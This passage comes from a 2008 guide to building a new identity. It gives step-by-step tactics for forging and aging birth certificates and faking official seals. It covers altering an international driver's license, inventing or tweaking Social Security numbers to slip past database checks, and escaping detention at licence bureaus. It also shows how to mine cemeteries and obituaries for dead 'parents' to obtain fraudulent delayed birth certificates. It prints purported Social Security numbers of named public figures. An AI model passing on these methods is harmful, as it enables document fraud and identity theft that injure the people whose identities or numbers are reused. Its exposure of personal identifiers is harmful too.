and re-fold the BC until it starts to fall apart. Fold over a +corner so that it’s "dog-eared". Carry your BC in an +envelope. It’s a valuable document (you put a lot of work into +it, didn’t you?). Go to an office supply store and buy one of +those brown paper carriers that say "Important Documents" +on the side. +Recently I was visiting an art museum and noticed +something interesting in the corner of the main reception +area. There was a tall, slender vending machine that sold +custom stamped aluminum souvenir "coins". These +machines have been around for years and are usually found +in amusement parks and penny arcades. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 47 - +Reproduction in any form is prohibited without written permission. + +The machine looks a bit like a one armed robber slot +machine. It has a display area on the front and a large +handle on the right you pull down to make an impression. +You point the dial on the front of the machine to the desired +letter you want imprinted on your coin and then pull the lever +down (all the way so you get a good impression). +When you are done you turn the dial to "I'm done" and your +customized coin is dropped into a bin at the bottom of the +machine. Cost: One dollar per coin. +Why would anyone be interested in such a silly little +souvenir? The customized printing is placed in an arc around +the bottom of the coin. Wouldn't such a coin with the letters +"Department of Vital Records" or perhaps "City of St. Louis" +be interesting? If someone wanted to, they could use such a +coin to create a very official looking impression on an official +document. (Using the technique described above). +This just goes to show - you have to keep your eyes open at +all times if you want to find the best techniques! +Drivers Licenses +If you’re young enough, explaining why you’re attempting to +get a new drivers license is easy. Past age 25 or so it gets a +bit more difficult. Women have it easier here. +Complete one of those driver-training programs (bring your +graduation certificate with you) and be prepared to discuss +your personal situation if you're asked. One guy I heard +about nervously claimed he needed a new driver’s license +because he had been in prison! +One friend I knew needed a new driver’s license because he +had been overseas working in Saudi Arabia (Saw’-Dee-A- +Ra’-bia) for the ARAMCO (A-Ram’-Co) Oil company and +only had an international AAA drivers license. +At this point it may be helpful to call your local drivers license +bureau. Ask them what documents you must bring with you +to secure a new drivers license. After they run through their +short list of difficult-to-obtain documents, ask if there are any +other documents they will accept. If you carefully review the +applicable rules of several states on this - you'll find that after +© Copyright 2008, Ariza Research, All rights reserved - ABP - 48 - +Reproduction in any form is prohibited without written permission. + +listing a short list of hard-to-get documents (like a passport) +they will include a sentence like "or any other document that +establishes age, residence or identity". +For example, the state law in New York includes the +following: "If the required documents are unavailable, a +supervisor will examine and approve other proofs." +They will also consider any document that "states your age +or address". +The Virginia requirements accept school transcripts "or any +other document that lists your full name and date of birth". +Also, several states will willingly accept expired ID provided +it hasn’t been expired too long. +A few states will even accept an apartment lease contract. +(Black lease agreement forms can be purchased at any +office supply store) Be persistent and keep asking for other +documents they’ll accept until you get the answer you want. +These clerks are often very overworked and bored so often +their sole motivation is to get you processed and back on the +street. +In most cases a good birth certificate along with a baptismal +certificate and maybe a library card should get you through if +you look and act right. Keep in mind that some states require +an auto inspection certificate and others also require proof of +insurance. Also ask what the fee is and be sure to bring +sufficient cash with you. +2006 Update: Recently new legislation has been +proposed that would require more extensive +documentation for a drivers license application. From +our experience the states that have tried to tighten up +the application process in this way have run into two +problems. +First, any document they require can be obtained +without too much of a problem. And secondly, the +clerks in these offices are no geniuses. These new +more restrictive application requirements mean +nothing when they are administered by dimwitted +clerks who are unable or unwilling to critically +examine offered documents. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 49 - +Reproduction in any form is prohibited without written permission. + +The only change that would really restrict driver +license access would be an online birth certificate +verification system which now seems at least seven to +tens years away. +Here are some details from a group down south. They prefer +to use a branch office, not the busy downtown headquarters. +They park their car where it can’t be seen from the license +bureau front window. Around back or way out in the parking +lot would be best. Lunch hour on a weekday would be a +good time. Visit the place beforehand to check it out. Drive +by and check out the line. The busier it is – the better. +Some bureaus have several security guards while the +smaller ones don't bother. They walk in and ask for the study +guide for the written test. If they need to take a written test, +they study carefully for it, failing the test would be a real +disappointment. +Also note that 47 states have formed what is called "The +Drivers License Compact" which provides for the sharing of +driving violation information between their computers. +Georgia, Michigan and Kentucky have not yet joined but still +send violation info to other states. +If you have tickets in other states, don't plan on getting a +new license until the court is ready to allow it. The clerks at +the bureau are always on the lookout for DUI offenders +who’ve had their licenses revoked in nearby states. If the +clerk suspects anything, it will be that you are a DUI offender +seeking to get around your suspension. +What did the Boy Scouts teach you? BE PREPARED. Be +sure to memorize your parent's names, birth dates, places of +birth, occupations and particularly your mother’s maiden +name. +Some clerks will pull the following stunt. The clerk will take a +BC and hold it where you can’t see it and then ask you to +recite all or part of the information on it from memory. Be +ready for this. Study your new BC until you have it all +memorized. +Dress conservatively. If you’re a man: a nice blue suit +complete with a gold cross on the lapel (indicating church +membership) or at least a clean, freshly pressed less formal +© Copyright 2008, Ariza Research, All rights reserved - ABP - 50 - +Reproduction in any form is prohibited without written permission. + +outfit. If your hear is long, get it cut. If you’re a woman, dress +as though you’re an office manager or you’re on your way to +a job interview. You must look respectable but low-key. No +flashy clothes. +Fit in. Your goal is to come and go without anyone ever +noticing you. If their suspicions are aroused, all they’ll have +to go by is your appearance, your behavior and your story. +It would be foolish for anyone to apply for a new license with +documents in their possession that list a different name. A +good tactic is to clean out your wallet or purse before arriving +at the bureau. +Have a baptismal certificate with you. Some have found it +useful to carry around some other "soft" ID like receipts with +your name on them; membership cards in private clubs or +other organizations. A library card is always a good bet as in +some areas it's widely respected. Receipts are another good +bet. +Here is how the bureaus usually handle social security +numbers. If an applicant were to apply using a made-up +social security number, a problem might occur. If the number +is from a distant state it won't probably cause this problem so +readily. If the applicant's social security number matches one +that's already in their database - the computer may "beep", +and notify the clerk of the match. +Users of this approach have used the following tactic. Write +down your new social security number on a slip of paper and +then store it away in your wallet or purse. +Then where the number is goes on the application form - +carefully switch the last two numbers. If the application sails +through with no number match, no problem. But if the +computer detects the match, the applicant can quickly +correct their error and complete the processing. +Most states require a social security number when you apply +for a driver’s license. A few, like New York, actually require +that you bring your social security card with you. An official +looking metal social security "card" can be purchased +through the mail. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 51 - +Reproduction in any form is prohibited without written permission. + +One lady simply reported her social security card lost and +gave the DMV clerk her application as proof of her dilemma, +which was accepted no questions asked. +Here’s an alternative to drivers’ licenses. Some states issue +official ID cards for people who don’t drive for check cashing +and general ID purposes. Some applicants suffer from +serious diseases that make it impossible for them to drive +(such as epilepsy). +This ID card has the same legal impact as a real drivers +license. The clerks seem to be less restrictive on their +scrutiny of ID documents when the applicant is only seeking +a state ID card. I suppose that's because they don't have to +worry about possible speeding ticket/DUI problems with a +simple ID card. +This tip is well known amongst Americans who live and work +overseas. An international driver’s license can be purchased +at any AAA office. This document, which looks like a little +booklet, can easily be taken apart; the name altered and +reassembled leaving the photo intact. There are those who +have used this simple document to open offshore bank +accounts and to obtain other ID documents. +Some users who ran into problems with their application +used this simple tactic to escape any further questions. They +said something like "look I can straighten this all out - I’ve got +my passport in my car, I’ll go get it for you." They move +toward the door and just keep moving. +If they try to force you into an interrogation room just mention +that you left your child (or dog) out in the car so just have to +go but you'll be right back. Unless an applicant has done +something clearly illegal you have a right to leave whenever +you like. +They might try to "urge" you to go to an interrogation room +by saying something like "come along, you’re creating a +scene". Smile warmly, look at your watch impatiently and +keep moving toward the door. If you have to, start getting a +little hysterical about your poor child baking out there in your +hot car. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 52 - +Reproduction in any form is prohibited without written permission. + +WARNING: An applicant who wanders into a license bureau +dressed in rags, looking like a bum (or a long haired, +drugged out generation Xer) and then presents the clerk with +suspicious looking ID documents can expect to be detained, +questioned and possibly arrested. None of this will happen if +you dress and act like a responsible and clean working +citizen. +The Numbers Game – The Social Security Number +System +This quick and easy system will not get you an original social +security number and a real social security card. Due to a +1984 federal anti-immigration law, all employers will insist on +seeing your genuine SSN card before you start work. If the +job includes medical benefits, the medical insurer will also +need an SSN. +Some identity changers have simply made up a fake number +and used it. But recent changes in the law can make this +illegal under certain circumstances (I'd list them for you but +they're changing so fast no one can keep track) +There are those who purchase a fake social security card on +the street in any large city. A piece on the popular CBS show +"60 Minutes" highlighted the ease with which they can be +purchased. Unfortunately the purchase is illegal and +chances are excellent that the card you get will be stolen or +just a copy of a stolen document. This approach is seldom +worthwhile. +The social security system is a typical large paper-shuffling +government agency. It may be difficult to get them to send +you a new card - but it’s not impossible. +Here is a detailed explanation of the social security +numbering system. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 53 - +Reproduction in any form is prohibited without written permission. + +A Social Security Number has three separate parts each +separated by a hyphen. +123 45 6789 +Area Group Serial +Number Number Number +The first three numbers are called the "area number" and +indicate the geographical area of issue. They follow the +following scheme: +Area Numbers +001-003 NH 400-407 KY 530 NV +004-007 ME 408-415 TN 531-539 WA +008-009 VT 416-424 AL 540-544 OR +010-034 MA 425-428 MS 545-573 CA +035-039 RI 429-432 AR 574 AK +040-049 CT 433-439 LA 575-576 HI +050-134 NY 440-448 OK 577-579 DC +135-158 NJ 449-467 TX 580 VI (Virgin Islands) +468-477 +159-211 PA 581-584 PR (Puerto Rico) +MN +212-220 +478-485 IA 585 NM +MD +486-500 +221-222 DE 586 PI (Pacific Islands) +MO +223-231 VA 501-502 ND 587-588 MS +232-236 +503-504 SD 589-595 FL +WV +237-246 NC 505-508 NE 596-599 PR (Puerto Rico) +247-251 SC 509-515 KS 600-601 AZ +252-260 GA 516-517 MT 602-626 CA +261-267 FL 518-519 ID 627-645 TX +268-302 OH 520 WY 646-647 UT +303-317 IN 521-524 CO 648-649 NM +© Copyright 2008, Ariza Research, All rights reserved - ABP - 54 - +Reproduction in any form is prohibited without written permission. + +318-361 IL 525 NM +362-386 MI 526-527 AZ +387-399 WI 528-529 UT +650-699 Unassigned - Reserved for future use +700-728 Used by railroad workers until 1963 - No +longer used +729-999 Unassigned - Reserved for future use +Choose an area number from a distant state to avoid +duplication problems with a genuine local number that might +appear in state compute databases. +The area numbers are assigned from low to high. The two +middle numbers, the "group numbers" are assigned in a +tricky sequence as follows: +1. Odd number pairs from 01 to 09 then +2. Even number pairs from 10 to 98 then +3. Even number pairs from 02 to 08 then +4. Odd number pairs from 11 to 99 then onto the next higher +area number +Let’s take Texas as an example. They began issuing +numbers with 627-01-0001 and proceeded to +627-09-9999. After that group series (01-09) was exhausted +they moved on to 627-10-0001 to +627-98-9999. then 627-02-001 etc... Get the idea? Also, a +SSN that has any of the three groups equal to all zeroes is +invalid. +Each month the social security people publish a list of the +latest numbers issued listed as an aid to those who need to +be able to spot fake numbers. If a number is too high, it’s a +fake. Note: Before 1965 only odd group numbers below 10 +and even numbers above nine were used. +If you choose a number in a low series, you will fall below +the latest number issued and you will then have a number +that appears genuine. However, the lower you go the greater +© Copyright 2008, Ariza Research, All rights reserved - ABP - 55 - +Reproduction in any form is prohibited without written permission. + +the chance you will be sharing someone else’s number. +You should also be aware that anything you do with +another's number could mess up an innocent person’s life. +And another problem, this other person may not be a nice +person; in fact he/she may be a wanted criminal or may have +a terrible credit history. Dead person’s numbers are re- +issued after a year’s delay. +If you desire to get a proper job or open a bank account or +safety deposit box, you’ll need a clean, new social security +number. I won’t lie to you, the government has made this by +far the most difficult part of building a virgin identity. Here are +some tactics others have described using. +Before opening a bank account you need to know that most +banks use an on-line computerized system that that confirms +the number has been issued, the year of issue, the place of +issue and if the number has been used for bank fraud or +insufficient funds use during the past five years. +CheXSystem (of Dallas, Texas) is the largest system. +They’re information is covered by the Fair Credit Reporting +Act so you can get a copy of your report directly from them if +you suspect any problems. +Here's a bit of interesting trivia. Way back in 1946 a major +wallet manufacturer began placing fake paper social security +cards in each of the wallets they made. To make them look +real they placed the SSN 078-05-1120 on each card. Over +the years over four thousand different people have used this +number! +There is little chance that a clerk or retail person will +recognize this number as a fake but any federal official will +recognize it as a fake immediately should it pass across their +desk. I use give out this number to snoopy people who have +no legal right to ask for my number. +The social security administration has requested that +commercial firms and Hollywood use numbers in the series +from 987-65-4320 to 987-65-4329 in their advertising and +movies. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 56 - +Reproduction in any form is prohibited without written permission. + +Just for giggles here are two interesting social security +numbers. Please don't abuse this information. +Bill Gates (Computer Mogul): 539-60-5125 +Ted Turner (Media Mogul): 253-56-8877 +My Story +About a decade ago I became interested in compiling my +family history. Starting with my Grandparents, I started +collecting information by searching through birth and death +records for more information. I did it part time as a hobby. +As I became more experienced, others began to seek me +out for guidance on how they could conduct research into +their families. Over time I gradually gained a reputation as +something of an expert on the acquisition of birth and death +information. +One day, out of the blue, a co-worker approached me with a +very unusual request. She was at her wits end. She came to +me because of my experience with birth and death +documents. Her ex-husband had beaten and raped her +several times and as if that wasn’t bad enough, he began +sexually molesting their 12-year-old daughter. When she +protested, she was beaten so badly she spent a full month in +the hospital. +Now, after their divorce, he was stalking her and brazenly +threatening her life and the life of her daughter. Restraining +orders were of little use. She had him arrested several times +but he always managed to talk his way out of jail in a day or +two. +And each time she received a particularly vicious beating for +her efforts. In an attempt to lose him for good, she moved +twice in three years. Unfortunately, through the services of +© Copyright 2008, Ariza Research, All rights reserved - ABP - 57 - +Reproduction in any form is prohibited without written permission. + +an experienced private investigator, he was always able to +locate her through her social security number. +The last time she moved she had her lease and all her +utilities put in a friend’s name. But once again, even after all +her efforts he managed to find her in less than three months! +Problem was, she had to work for a living and each new +employer was required by law to obtain her social security +number. He ex could then find her through her work record. +But what could she do? Wherever she moved she had to +work? +Finally, in desperation, she appealed to the social security +administration for a change in her social security number. +She and her daughter sat there and wept as she told her sad +and painful story to a heartless clerk who listened with a +stone face. +Two weeks later she received a form letter. They found her +problem was "not sufficiently compelling" to allow a number +change! +Then one night, she saw a gangster movie about a man who +had "informed" on the mob. He ended up with a new identity +furnished by the federal witness protection program. She +quickly realized that the creation of a virgin identity, complete +with a new social security number was the only way she +would ever get really free of her ex. She begged me to help +her. I told her that, though I sympathized with her, I wasn’t +sure there was anything I could do for her. I told her that +such a project would be difficult and besides - I wasn’t sure +we could pull it off without breaking some laws. +Her response was simple. If she couldn’t lose her ex - she +would be forced to kill him!. She had purchased a gun, and +though she had no idea how to use it, she was determined to +protect herself and her daughter. If you could have seen the +look in her eyes you would have know, as I did, that this was +a truly desperate lady who really meant what she said! I +promised to help her if she promised not to shoot anyone! +It took us a while as we had many lessons to learn along the +way. But after she had her new identity, she moved one last +time and was finally able to permanently dump her +tormentor. Two years later she has completely rebuilt her life +© Copyright 2008, Ariza Research, All rights reserved - ABP - 58 - +Reproduction in any form is prohibited without written permission. + +without fear of her ex showing up on her doorstep. (She still +has her gun though!) Oh I’m sure he’s still looking for her, +but now she has a new social security number so he’s just +wasting his time and money. +Since that time we’ve helped many people in distress create +completely new identities and get a second chance at life. +This report contains everything we’ve discovered along the +way. +As each person’s situation is unique, I’ve also included some +rather unusual optional strategies that may or may not be +useful to you. I’ve even included a few ideas that occurred to +us but for one reason or another were never actually used! +On the first read-through you’ll probably find all this a bit +confusing. Be patient. After several readings it’ll all begin to +make sense. To help simplify things, I’ve summarized +procedures in easy-to-read lists. +A Lesson in Law +Nothing in this report is to be regarded as legal advice. The +laws regarding the acquisition and use of identity documents +are constantly changing. But I will provide you with one small +nugget of free legal advice. +Often the difference between a legal act and an illegal one +has to do with the individual's intent. While it may be legal to +carry a concealed gun into a bank, it's clearly a federal +felony to carry the same gun into a bank with the intent of +committing a bank robbery. The difference is intent. +According to the Supreme Court, the act of creating an +alternative identity is not, in itself, an illegal act. However, if +you're seeking to establish a new identity to evade the long +arm of the law or fraudulently apply for government benefits, +you'll be committing a very serious crime. +Banking Precautions +MSNBC recently ran an interesting report, which exposed +some very serious weaknesses in our banking system. As +part of an investigation, journalists attempted to open +© Copyright 2008, Ariza Research, All rights reserved - ABP - 59 - +Reproduction in any form is prohibited without written permission. + +checking accounts in fake names at several New York City +banks. One of their female employees opened accounts at +eleven out of twelve different banks using only her MSNBC +employee identification card! +Only Citibank turned her away (they said her work ID card +was a secondary form of ID and they require at least one +"primary" ID document). All the other banks offered to make +an exception and open an account for her. +The message here is simple. This lady had a good story and +looked very professional - just the kind of lady who would +work in such a place. +Eleven out of twelve bankers went ahead and opened an +account for her. These bank people were so sloppy that she +was able to open three accounts using the name "Minnie M. +Mouse"! +Also, the work ID was a slick-looking, multi-color badge that +impressed the bank officials despite the obviously silly name. +Another important factor was the woman's appearance. She +appeared to be around 40, extremely well groomed and +dressed. +She looked exactly like you'd expect the employee of a +major television network to look. A nice business suit with +some understated jewelry and a very stylish yet conservative +winter coat. She looked and acted the part so she got the +benefit of a doubt. +Then to add insult to injury, our illustrious investigator +passed a number of obviously bogus checks with ease. +Several checks were photocopies with "VOID" all over them. +Several had "Do Not Cash - This Check is a Counterfeit!" +printed across the top. +One was signed "Bill Clinton" and another "Donald D. Duck" +and still they were cashed! All of the checks (but one) were +cashed. The one teller who refused a bogus check did so +because she recognized the TV reporter and so gave her +check extra scrutiny. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 60 - +Reproduction in any form is prohibited without written permission. + +Of course the real motive of the program was to justify +tightening up the entire banking system. The bankers are +experimenting with retinal scanning, fingerprint scanning and +even DNA identification. The system is pretty much wide +open these days. +Any good banker will tell you that bankers are less careful +these days because the IRS now allows banks to write off +fraud losses much more easily than in the past. And since +they don't stand to lose as much as before, they're not nearly +as careful. +Another news story involved a man who stole huge checks +from a fortune 500 company. The smallest check was for +over $18,000. The thief then sent the stolen checks to his +credit card companies as payments. What do you think +happened? Every single firm accepted the bogus checks +and credited his account. +Of course each check was made out to some other firm but +that didn't stop the banks from accepting them. Their greed +must have overwhelmed their fear. +Careful Banking +At first identity changers need to be careful about their +banking use early on. Later when their identity is better +established they can live more normal financial lives. +Those who have recently changed their identities usually +begin by opening a new bank account with around $250 in +cash. Be sure you open a non-interest bearing account like a +routine checking account. If the account earns even a single +dollar of interest the IRS will need to be notified. If the bank +clerk asks, be ready to bark out your social security number +confidently. +Any checks deposited to the new account will leave paper +trails. (When requesting birth certificates, pay with money +orders, not with checks.) At first identity changers usually +avoid visiting the lobby of the bank instead they conduct all +their banking through the ATM machines that are usually +located outside. They pay their bills with money orders +© Copyright 2008, Ariza Research, All rights reserved - ABP - 61 - +Reproduction in any form is prohibited without written permission. + +purchased from various sources including convenience +stores but not from their bank. +Here is a way to quickly establish some credit when you're +new in town. They open an account at a local credit union or +savings and loan. +They deposit cash and then wait two months or so and then +approach the institution for a loan fully secured by the new +account. Such a loan is almost always approved, usually +automatically. +After they've made several payments (on time) the +transactions will trigger the credit agencies to open an +account in their name and start collecting information on +their financial dealings. +This lays the foundation for later building a solid credit rating. +Finance or commercial store-front loan companies have a +bad reputation and people in the financial community know +that only low-life high risk customers would deal with these +places. +When it's time to go for an unsecured credit card, it's always +best to submit an application towards the end of November +as banks shift into high gear then in anticipation of increased +profits from holiday spending. +When the card is received, it's best to make a few +purchases, run up a moderate balance. Then apply for +another card in three months and in a year or so you should +have excellent credit. +Be Careful! +I stood behind a girl in a bank line who was opening a +checking account. She handed her application card to the +clerk who picked up the phone, dialed an 800 number, and +entered an access code and then the girl’s SSN. She +listened carefully and then stared at the girl with a stony +expression on her face. +She then put the phone down and handed the card back to +the applicant and said "thank you for your interest in opening +© Copyright 2008, Ariza Research, All rights reserved - ABP - 62 - +Reproduction in any form is prohibited without written permission. + +account with our bank but unfortunately we are unable to +open an account for you at this time - next!" The number the +bank lady called provides a service that provides the name +of the individual to whom the social security number was +issued. Obviously the name didn't match the girl’s name. +The "Quick and Easy" Checklist +- Obtain your own genuine birth certificate +- Buy cover up tape and liquid paper +- Mask out the original text to create blank +form +- Make copies of the new blank form +- Rent or buy an older typewriter and ribbon +- Type up new birth certificate with your new +name +- Make a copy +- Apply new stamp (optional) +- Artificially age the BC with +coffee/tea/vinegar or sunlight +- Forge a baptismal certificate (optional) +- Make up a new social security number from +a distant state +- Use your BC to get a new DL +The "Slow & Hard" Way +The users of this approach say it's much more difficult and +time-consuming but creates a new virgin identity that will +withstand even the most intensive scrutiny. Just try to think +of all this as a challenging game in which you’re going to +"beat the system". +If you need to obtain a new social security number and/or +need a passport in your new name, this is the only method +that will achieve those goals. I've heard of people getting +new social security numbers with forged birth certificates and +faked parents but if you attempt it, I’d bet against you and +know that you'll be breaking several rather serious laws. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 63 - +Reproduction in any form is prohibited without written permission. + +Until recently passports were only issued after the +applicant's birth certificate was verified with the issuing +authority. According to US State Department officials this +practice is being abandoned. +Given the dramatic increase in the number of international +travelers and the low-tech nature of most vital records +offices, several identity-changers have reported that they've +obtained US passports using forged birth certificates that +couldn't possibly pass any kind of verification. Several recent +articles have appeared in the media that seemed to verify +this trend though I expect requirements to be tighter over the +next few years. +First, make up a new birth date for your new identity. Do not +use your actual birth date! Doing this would create too +obvious a link between the two identities. +The next step involves the location of a new set of parents +(deceased of course). There are several ways to locate +these new parents. We’ll start with the easiest method. +Finding Your New “Folks” +The information users of this system need can be found +either in a small local cemetery or in the obits in your local +paper. Next to the obits should be a column of ads under the +heading of "burial plots" which provides a list of cemeteries. +Try to find the smallest, most remote one you can find that +has been burying people for the last few decades. +Remember, old historical cemeteries full of dead people are +of interest only to historians. +The next step is to do some simple math. +Your Birth Year 1968 +Minus 40 1928 +Minus 17 1951 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 64 - +Reproduction in any form is prohibited without written permission. + +So a new mother must have been born between the years +of 1928 and 1951 and have lived until your new birth date. +Now for good old Dad: +Your Birth Year 1968 +Minus 55 1913 +Minus 17 1951 +Your new father must have been born between 1913 and +1951 and have lived until 9 months before your new birth +date. +Your Birth Mother’s Father’s Birth +Date Birth Range Range +1980 1940-1963 1925-1963 +1970 1930-1953 1915-1953 +1960 1920-1943 1905-1943 +1950 1910-1933 1895-1933 +1940 1900-1923 1885-1923 +1930 1890-1913 1875-1913 +Unfortunately, finding new parents is much easier if you’re +older rather than younger. An 18-year old will have a +considerable problem finding suitable parents. +It's best to visit a cemetery wearing good walking shoes on a +dry day if possible. The best names can usually be found +near the largest monuments where family plots can be +found. Find three sets of new parents whose births and +deaths fall within the ranges you calculated. +When you do, write down all the information the headstone +contains. Complete names including full middle names are +better than names with middle initials only. The ideal plot will +be a small family plot well away from the main path would be +best. +Many cemeteries have overgrown areas where, sadly, no +visitors have come to clean up their graves. A completely +overgrown headstone that is buried under weeds would be +best. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 65 - +Reproduction in any form is prohibited without written permission. + +Users of this system report that common surnames are best +and they avoid oddball highly ethnic last names like +"Kramarzinski". Names that were in common use around the +time of your childhood would be more credible. For example +twenty years ago "Jennifer" became a very popular first +name due to a popular TV show. +If your ethnic origins are obvious, you’ll have to limit your +search to surnames that match your face. Try to find a +cemetery that contains as many of "your people" as +possible. Perhaps a cemetery in a matching ethnic +community would be best. +Each cemetery has an official "record-keeper". Their records +are often so comprehensive and complete that all the +information you need can be obtained right there on the +spot, or they may be completely useless, continually +unavailable or just plain uncooperative. +Those who are doing family research often search out record +keepers for more detailed information. They may hint that a +contribution would be appreciated so please be generous. (I +once had an old-lady smugly wave an empty pickle jar +labeled "Contributions" in my face when I asked for +information!) +Be warned that the record keeper may launch into a sales +pitch for burial plots. Get whatever info you can but keep in +mind that the key piece of information you need at this point +is your new mother’s maiden name. +Another system for discovering a deceased woman's maiden +name is as follows. Drive to the largest library you can find. +A smaller suburban library may have everything you need. +Call them and ask if they have the biggest newspaper in +town on microfilm and do their records go back to your new +parent’s birth period. +When you get there, ask the reception librarian where the +newspaper records are kept. Pull the microfilm rolls for the +death dates of each of your prospective new parents. Take +plenty of small change with you so you can make copies of +the obits you find. You will not find all the obits you seek. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 66 - +Reproduction in any form is prohibited without written permission. + +People die and are shipped across state lines all the time. +This is why I asked you to get several sets of prospective +parents. +Getting Help – from a Church! +Grab your yellow pages and look under churches - yes +churches! Find the nearest Mormon Church. It may be listed +under "Churches of Jesus Christ of Latter Day Saints" Yes, +those nice Mormons are going to help you get a new ID! Call +them up. +Ask them if they have a "Family History Center" in their +church. If not, find out where the nearest "Family History +Center" is and pay them a visit. Take a pad, a pen and a +pocket full of dimes and quarters for the copy machines. +Once again your appearance is important. Dress nice and +act nice. Go during the day on a weekday to avoid the rush. +The place can be a real zoo evenings and Saturdays. It’s not +uncommon to have to wait an hour or more just to get +access to one of the viewing machines. If you arrive mid-day +on a weekday you should have the whole place to yourself. +What you need will probably take several hours to find so +arrive early after a full meal. (I usually take some cookies to +munch on in a paper bag in my brief case!) +When you get there chat with the volunteer (usually a nice +old lady) on the information desk. They can be quite helpful. +Tell them you’re doing a little genealogy research (checking +up on your family roots). Ask to see the family histories. +These are family trees compiled by professional +genealogists and can be as useful as a cemetery when +seeking new parents. +All the same birth and death time frames apply. Scan the +© Copyright 2008, Ariza Research, All rights reserved - ABP - 67 - +Reproduction in any form is prohibited without written permission. + +family trees for the most recent ones. Again old information +won’t help us a bit. +The previous two methods are easier than searching the +death records but many have found the following useful so +I’ve included it. Ask to see the death records (not the social +security death records). The Mormon Church has, over the +years, assembled the largest death record database in the +world. +Their death files are organized by state. Search one state +until you find what you need. Then grab another state etc.. +This - will - take - time! The records are huge and most of +these people lived far too long ago to be of use to you. +Avoid searching the most populous eastern states and +Nevada, Colorado and California. The other western and +plains states are best. They have fewer and easier +restrictions on issuing new birth certificates. +Getting a new BC issued in New York City or Los Angeles is +all but impossible. In the large cities you can expect to find +the public records sealed to all but attorneys and +professional licensed genealogists. Of course the excuse +given for these illegal restrictions is their desire to limit +welfare cheating. +Cruise the records looking for a married couple who were +wed a year or two before you were really born. When you +find a suitable pair, make a copy to capture the information +and be sure the copy is fully readable. Go on to the next +state’s records. +Make up your new name complete with your new last name +taken, of course, from your new parents. +Mail a hand-written note to the bureau of vital records for the +states/counties where your new parents lived. Tell them that +you need a BC as you need it to apply for a government +security clearance. +This is a common request. Ask them to please hurry as you +can’t start work until you get your BC. People who request a +BC because they are "doing some family research" will often +find themselves at the bottom of the stack priority-wise. +Several professional genealogists have told me that it can +© Copyright 2008, Ariza Research, All rights reserved - ABP - 68 - +Reproduction in any form is prohibited without written permission. + +take three to six months to get a BC that way! If they offer +rush service for a few bucks more, use it. +Let Us Pray! +Here is some interesting information on the Mormon religion. +Pay attention, you may need to know about this stuff. +Federal law considers all birth certificate records public +records. +The Mormon religion allows Mormons to list their relatives +going back three generations on a form and perform what +they call "Ordinances For the Dead". +They believe that this ritual will, in effect, yank these +relatives from the bowels of hell and instantly transport them +to heaven. (This is no joke - the Mormons are very serious +about this stuff). And they are a very rich and powerful +organization. So you can see that the local officials who are +seeking to seal the records regularly come into conflict with +Mormons seeking BCs for religious reasons. +The vital records clerks fear the Mormon church because the +Mormons are in the habit of sending in teams of lawyers +when a church member is denied the BC of a relative. A +number of clerks and managers have actually been +terminated and fined for illegally restricting access. +The Mormons have challenged restrictions in courts +numerous times and have never lost. (After all, you wouldn’t +want Grandma to spend eternity in hell just because you +couldn’t get a slip of paper from some uncooperative clerk +now would you?) +Most identity-changers request a birth certificate via rush +service by specifying that it's for a pre-employment security +clearance. This usually gets fast service. If you are denied a +BC for some phony reason, send them back a note +mentioning the Mormon temple you belong to. I had one BC +Federal Expressed to me at no cost when I used this trick. +The clerks really fear the Mormon Church. +Each state has it's own unique birth certificate request form. +Fill them out requesting that they search for a copy of your +new identity BC. They should cost around 5 to 10 bucks +© Copyright 2008, Ariza Research, All rights reserved - ABP - 69 - +Reproduction in any form is prohibited without written permission. + +each. Send a money order, not a check. Users suggest +requesting the birth certificate in a new name when you +know for sure it doesn't exist. +After the search, they will return two forms. The first one will +be a simple form with a box checked indicating that their +search was unsuccessful. +The second form will be an application for "delayed record of +birth". They assume that if you’re alive and breathing, you +must have been born. +And if they don’t have a record of your birth – they’ll want to +add you to their records. Besides, you'll need to do whatever +you have to get a birth certificate - no birth certificate equals +no security clearance equals no job! +With this form you can create a new birth certificate and +have an official, verifiable birth certificate entered into the +official records. Unfortunately, they will require some +documentation to substantiate your claim but some of the +documents they recognize aren't all that difficult to come up +with. (See the list below) +They will provide you with a list of documents that they will +accept as proof of your birth claim. Some states require all +sorts of extremely difficult-to-obtain notarized documents +while other states are much less demanding. And the rules +are constantly changing which keeps it interesting. +ID Documents Accepted by Some States +(to qualify for a delayed birth certificate) +Church Records +Medical Records +Baptismal Certificate/Circumcision Certificate +Military ID or Discharge Papers (DD-214) +School Transcripts +Voter Registration Card (ridiculously easy to obtain) +Marriage license (or completed application form) +Census Record +Social Security Number Confirmation (from SSA) or SSN +© Copyright 2008, Ariza Research, All rights reserved - ABP - 70 - +Reproduction in any form is prohibited without written permission. + +Application +Insurance Application +Lease Contract or Application +Your Child's Birth Certificate +Newspaper Notice of Your Birth +Family Bible Record +Employment Record +Sibling Birth Certificate +College Records/Transcripts +Employment Application +Union Membership Card +Note: Some states require that these documents be at least +five years old or that they were issued after your fifth or tenth +birthday. Ask for details. +As you can see - there's plenty of room to maneuver here. +Some of these documents are much easier to obtain than +others. One particularly interesting document they will accept +is a signed statement from someone who was present at +your birth. Some have reported that such a statement can be +easily forged. A close friend of your mother's might very well +have witnessed your birth. +Did you know that almost a third of the people walking the +streets never had their birth recorded? It’s true! Births were +not recorded for a variety of reasons. Some parents +belonged to religions that actively discouraged registering an +infant's birth. +Some children were born in such poverty that the paperwork +was the last thing on the parent's mind. Some were born in +remote areas where access to government was severely +limited. +During the free-love 1960s many unmarried couples had +kids and had no interest in filling out "big brother's" forms. +Some babies were born in cults who discouraged such +registration. And some were adopted which leads to a host +of birth registration problems. +Some births were never recorded because of strong +religious objections. Quakers and others refused to register +their newborn babies. If someone's parents were religious +Quakers it would easily explain why there was no record of +their birth. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 71 - +Reproduction in any form is prohibited without written permission. + +One lady used the following approach. She obtained a +newspaper from the town nearest the place of birth. She +scanned the obits and found a local deceased lady who was +born around the same time as their mother. Here is a lady +who could have been present at your birth. Any statement +she signed just before her death would be legally yet very +difficult to verify. Her home address would be the nursing 